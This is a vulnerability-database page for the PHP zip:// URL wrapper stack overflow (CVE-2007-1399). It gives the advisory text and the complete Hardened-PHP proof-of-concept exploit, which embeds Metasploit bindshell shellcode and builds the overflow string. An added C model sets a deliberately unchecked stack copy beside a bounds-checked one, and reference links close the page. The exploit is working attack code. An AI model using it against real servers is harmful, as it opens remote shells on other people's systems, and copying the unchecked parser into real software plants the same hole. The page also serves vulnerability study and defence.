PHP Zip "zip://" URL Wrapper Stack Buffer Overflow Vulnerability

Vulnerability ID 1112402  Vulnerability type: Buffer overflow
Published 2007-03-09  Updated 2007-09-24
CVE ID CVE-2007-1399  CNNVD ID CNNVD-200703-326
Platform Linux  CVSS score 10.0
|Vulnerability Sources
https://www.exploit-db.com/exploits/3440
https://www.securityfocus.com/bid/22883
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-326
|Vulnerability Details
A stack-based buffer overflow exists in the zip:// URL wrapper of PECL ZIP 1.8.3 and earlier. When that extension is bundled with PHP 5.2.0 or 5.2.1, a remote attacker can execute arbitrary code by supplying a long zip:// URL. The URL reaches the wrapper through any stream function that accepts a path (the proof of concept below uses fopen()), so an attacker who controls a filename passed to such a function, for instance through a remote file inclusion, can trigger it without needing a real archive on disk. The proof of concept sizes its payload around a 4096-byte buffer (4096 + 32 bytes of path data) and pads the overflow with a POP EBP; RET address taken from a specific PHP binary, so the offset must be adjusted for any other build.
|Vulnerability EXP
<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //            PHP zip:// URL Wrapper Stack Buffer Overflow            //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // Offset of a POP EBP, RET inside the PHP binary
  $offset = 0x080d7da3;

  // linux x86 bindshell on port 4444 from Metasploit
  $shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
      "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
      "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
      "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
      "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
      "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
      "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

  // Align the shellcode on 4 bytes      
  while (strlen($shellcode) % 4 != 0) $shellcode .= "X";

  // Convert Offset into String and calculate size
  $str = pack("L", $offset);
  $len = 4096 + 32 - strlen($shellcode) - 400;
  
  // Construct the filename
  $fname = "zip://A".str_repeat("A", 400)."$shellcode".str_repeat($str, $len / 4)."#EXPLOIT";

  // Trigger the exploit. The filename could equally arrive via a remote URL include.
  fopen($fname,"a+");

?>

# milw0rm.com [2007-03-09]
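The advisory text and the proof of concept above describe the bug class without showing the vulnerable code, so here is an added C model (written for this page, not PHP's ext/zip source) of the pattern: the archive path before the '#' of a zip:// URL is copied into a fixed-size stack buffer with no length check, next to a checked version that refuses over-long paths. It also computes the length of the path the PoC builds ("A" + 400 x "A" + shellcode + padding to 4096 + 32 bytes): the shellcode length cancels out, so the path is always 4096 + 33 bytes, 33 bytes past a 4096-byte buffer. MAXPATHLEN = 4096 (the Linux value), the function names and the sample URLs are assumptions for the example; no shellcode is used, and the unchecked parser is only ever called with a short URL.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef MAXPATHLEN
#define MAXPATHLEN 4096          /* Linux value; assumption for this model */
#endif
#define ZIP_SCHEME "zip://"
#define ZIP_SCHEME_LEN (sizeof(ZIP_SCHEME) - 1)

/* Vulnerable shape (model, not php_zip.c): the archive path is copied into a
 * fixed stack buffer without checking that it fits. Only call with short
 * input; a path longer than MAXPATHLEN overruns the stack. */
static int split_zip_url_unchecked(const char *url, char *out_dir, size_t out_dir_len)
{
    char file_dirname[MAXPATHLEN];            /* fixed-size stack buffer */
    const char *path, *fragment;

    if (strncmp(url, ZIP_SCHEME, ZIP_SCHEME_LEN) != 0)
        return -1;
    path = url + ZIP_SCHEME_LEN;
    fragment = strchr(path, '#');
    if (fragment == NULL)
        return -1;
    /* BUG: fragment - path is attacker controlled and is never compared
     * against sizeof(file_dirname); a long zip:// URL writes past it. */
    memcpy(file_dirname, path, (size_t)(fragment - path));
    file_dirname[fragment - path] = '\0';
    snprintf(out_dir, out_dir_len, "%s", file_dirname);
    return 0;
}

/* Hardened shape: bound every copy by its destination before writing.
 * Returns 0 on success, -1 malformed URL, -2 archive path too long,
 * -3 entry name missing or too long. */
static int split_zip_url_checked(const char *url, char *out_dir, size_t out_dir_len,
                                 char *out_entry, size_t out_entry_len)
{
    const char *path, *fragment;
    size_t dir_len, entry_len;

    if (strncmp(url, ZIP_SCHEME, ZIP_SCHEME_LEN) != 0)
        return -1;                            /* not a zip:// URL */
    path = url + ZIP_SCHEME_LEN;
    fragment = strchr(path, '#');
    if (fragment == NULL || fragment == path)
        return -1;                            /* need "archive#entry" */

    dir_len = (size_t)(fragment - path);
    entry_len = strlen(fragment + 1);
    if (dir_len >= MAXPATHLEN || dir_len >= out_dir_len)
        return -2;                            /* refuse instead of overflowing */
    if (entry_len == 0 || entry_len >= out_entry_len)
        return -3;

    memcpy(out_dir, path, dir_len);
    out_dir[dir_len] = '\0';
    memcpy(out_entry, fragment + 1, entry_len + 1);   /* includes the NUL */
    return 0;
}

/* Path length the PoC above builds: 1 + 400 + shellcode + (4096+32-shellcode-400). */
static size_t mopb16_path_len(void)
{
    return 1 + 400 + (4096 + 32 - 400);       /* 4129, whatever the shellcode size */
}

/* Constructed test URL shaped like the PoC: "zip://" + path_len x 'A' + "#" + entry.
 * Caller frees the result. */
static char *build_long_zip_url(size_t path_len, const char *entry)
{
    size_t n = ZIP_SCHEME_LEN + path_len + 1 + strlen(entry) + 1;
    char *url = malloc(n);
    if (url == NULL)
        return NULL;
    memcpy(url, ZIP_SCHEME, ZIP_SCHEME_LEN);
    memset(url + ZIP_SCHEME_LEN, 'A', path_len);
    url[ZIP_SCHEME_LEN + path_len] = '#';
    strcpy(url + ZIP_SCHEME_LEN + path_len + 1, entry);
    return url;
}

/* Verdict of the checked parser on a PoC-shaped URL; -2 means it was refused. */
static int checked_verdict_on_poc_url(void)
{
    char dir[MAXPATHLEN], entry[64];
    char *url = build_long_zip_url(mopb16_path_len(), "EXPLOIT");
    int rc;
    if (url == NULL)
        return -99;
    rc = split_zip_url_checked(url, dir, sizeof dir, entry, sizeof entry);
    free(url);
    return rc;
}

/* Both parsers must agree on a benign URL; returns 1 if they do. */
static int benign_url_ok(void)
{
    char dir1[MAXPATHLEN], dir2[MAXPATHLEN], entry[64];
    const char *url = "zip:///tmp/archive.zip#inside/file.txt";   /* constructed */
    if (split_zip_url_unchecked(url, dir1, sizeof dir1) != 0) return 0;
    if (split_zip_url_checked(url, dir2, sizeof dir2, entry, sizeof entry) != 0) return 0;
    return strcmp(dir1, "/tmp/archive.zip") == 0 && strcmp(dir2, dir1) == 0
        && strcmp(entry, "inside/file.txt") == 0;
}

int main(void)
{
    printf("benign URL parsed by both parsers: %s\n", benign_url_ok() ? "yes" : "no");
    printf("PoC-shaped path length: %zu (MAXPATHLEN %d)\n", mopb16_path_len(), MAXPATHLEN);
    printf("checked parser verdict on PoC-shaped URL: %d\n", checked_verdict_on_poc_url());
    return 0;
}
```

The point of the checked version is that the length comparison happens against the destination size before any memcpy, and that the parser returns a distinct error instead of truncating silently; truncation would hide the attack from logs, while an explicit refusal on a 4129-byte archive path is something a WAF or application log can flag.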
|Affected Products
SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21 + Linux kernel 2.4.19
SuSE SUSE Linux Enterprise Server 10
SuSE S
|References

Source: BID
Name: 22883
Link: http://www.securityfocus.com/bid/22883
Source: MISC
Link: http://www.php-security.org/MOPB/MOPB-16-2007.html
Source: XF
Name: pecl-url-wrapper-bo(32889)
Link: http://xforce.iss.net/xforce/xfdb/32889
Source: OSVDB
Name: 32782
Link: http://www.osvdb.org/32782
Source: VUPEN
Name: ADV-2007-0898
Link: http://www.frsirt.com/english/advisories/2007/0898
Source: DEBIAN
Name: DSA-1330
Link: http://www.debian.org/security/2007/dsa-1330
Source: SECUNIA
Name: 25938
Link: http://secunia.com/advisories/25938
Source: SECUNIA
Name: 24514
Link: http://secunia.com/advisories/24514
Source: SECUNIA
Name: 24471
Link: http://secunia.com/advisories/24471
Source: SUSE
Name: SUSE-SA:2007:020
Link: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html